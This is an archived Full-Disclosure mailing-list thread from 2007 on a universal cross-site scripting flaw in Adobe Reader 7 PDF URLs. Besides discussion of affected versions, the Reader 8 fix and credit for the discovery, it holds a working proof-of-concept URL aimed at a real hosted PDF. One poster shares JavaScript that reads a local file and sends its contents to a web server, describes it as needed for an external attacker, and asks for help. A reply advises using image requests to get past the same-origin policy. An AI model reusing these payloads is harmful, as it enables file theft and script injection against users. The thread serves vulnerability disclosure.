Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Anyone knows how this affects opensource PDF viewers like gpdf or evince? As I understand this vulnerability, it's only effective against embeded PDF readers, right? A. signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
The Anarcat wrote: Anyone knows how this affects opensource PDF viewers like gpdf or evince? As I understand this vulnerability, it's only effective against embeded PDF readers, right? I don't know what you mean embedded. It only affects Adobe Reader 7. Matthew Flaschen signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Thierry Zoller wrote: Dear List, Did anybody mention this does not work in Adobe Acrobat Reader 8 ? Or KPDF... The point is that it's not the PDF executing anything, it's the Reader. Yet another reason most people shouldn't use Adobe Reader. Matthew Flaschen signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
This is in the original advisory. http://www.wisec.it/vulns.php?page=9 Il giorno ven, 05/01/2007 alle 15.53 +0200, Kristina Lein ha scritto: Also I have to tell that my firefox crashed when I appended some random document.write('foobar') to exploit. I suppose it wrote it to PDF memory?! In this case we maybe can also execute code? Scary. Tõnu Regards Stefano -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Web: www.wisec.it .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Dear List, Did anybody mention this does not work in Adobe Acrobat Reader 8 ? -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0. I've actually tested it. On Reader 8 Acrobat you get a messagebox that says This operation is not allowed Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8. - Juha-Matti Larry Seltzer [EMAIL PROTECTED] wrote: According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0. I've actually tested it. On Reader 8 Acrobat you get a messagebox that says This operation is not allowed Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
I'm trying to put together a demonstration of this vulnerability, and how it could effect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver, the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability: Here's the code I have so far, based more or less on PDP's Vanilla, almost' PDP's (different url, spaces removed etc.) file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4)alert( xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); What I'm trying to do: file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert( xhr.responseText);xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechage = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6) I think because by default IE disallows Javascript access on the local context. Try putting this is IE: file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol') ; and then try it in FireFox It won't work in IE 6, but it executes just fine in FireFox. function cXHR(){ //Grabs a legit XHR. try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new XMLHttpRequest(); }catch(e){} return null; } var xhr = cXHR(); //For grabbing var xhr2 = cXHR(); //For sending xhr.onreadystatechange = function(){ if (xhr.readyState == 4){ alert(xhr.responseText); xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText); //Send it up, yo. xhr2.onreadystatechage = function(){ alert('File Transferred!'); }; xhr2.send(null); } }; xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true); xhr.send(null); Anyone's input on this matter would be appreciated. On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote: Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8. - Juha-Matti Larry Seltzer [EMAIL PROTECTED] wrote: According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0. I've actually tested it. On Reader 8 Acrobat you get a messagebox that says This operation is not allowed Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
I just skimmed through your code very quickly and I noticed a single problem. Don't send the captured data with another XHR (xhr2). Use images. var img = new Image() img.src = url; this should work. On 1/4/07, T Biehn [EMAIL PROTECTED] wrote: I'm trying to put together a demonstration of this vulnerability, and how it could effect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver, the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability: Here's the code I have so far, based more or less on PDP's Vanilla, almost' PDP's (different url, spaces removed etc.) file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); What I'm trying to do: file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechage = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', ' file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6) I think because by default IE disallows Javascript access on the local context. Try putting this is IE: file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol') ; and then try it in FireFox It won't work in IE 6, but it executes just fine in FireFox. function cXHR(){ //Grabs a legit XHR. try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new XMLHttpRequest(); }catch(e){} return null; } var xhr = cXHR(); //For grabbing var xhr2 = cXHR(); //For sending xhr.onreadystatechange = function(){ if (xhr.readyState == 4){ alert(xhr.responseText); xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText); //Send it up, yo. xhr2.onreadystatechage = function(){ alert('File Transferred!'); }; xhr2.send (null); } }; xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true); xhr.send(null); Anyone's input on this matter would be appreciated. On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote: Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8. - Juha-Matti Larry Seltzer [EMAIL PROTECTED] wrote: According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0. I've actually tested it. On Reader 8 Acrobat you get a messagebox that says This operation is not allowed Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Universal XSS with PDF files: highly dangerous
I will be very quick and just point to links where you can read about this issue. It seams that PDF documents can execute JavaScript code for no apparent reason by using the following template: http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here You must understand that the attacker doesn't need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that's all about it. The rest is just a matter of your abilities and desires. This finding was originally mentioned by Sven Vetsch, on his blog. This is a very good and quite interesting. Good work. There is a POC I composed: http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null); More on the matter can be found here: http://www.gnucitizen.org/blog/danger-danger-danger/ http://www.disenchant.ch/blog/hacking-with-browser-plugins/34 -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
[EMAIL PROTECTED] wrote: Sorry about that but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin. the original paper is located here http://events.ccc.de/congress/2006/Fahrplan/events/1602.en.html probably Stefano and Giorgio will post something on their site http://www.wisec.it/ (!hey i'm waiting too stefano : D) the technique exposed is really really neat but was only one of that has been presented at ccc in that talk (UXSS was used as an attack vector to inject JS to wrap/tamper xmlhttprequest and if the users had a proxy on his side http response splitting was used in conjunction to some keepalive bugs to tilt the browser cache to cause cross domain scripting, all this was autoinjecting) yeah it needs some conditions (a proxy with keepalive) but this is a bomb itself : ) from the pdf: Ajax Security, Universal Cross Site Scripting, Code Injection, Cache Poisoning, Prototype Hijacking, Auto Injecting Cross Domain Scripting anyway i expect to see something like an advisory/paper posted somewhere soon from the wisec staff because it's obvious that the ccc pdf isn't enough to metabolize all that stuff regards, Francesco 'ascii' Ongaro http://www.ush.it/ ps: flash 8 is fixed : ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/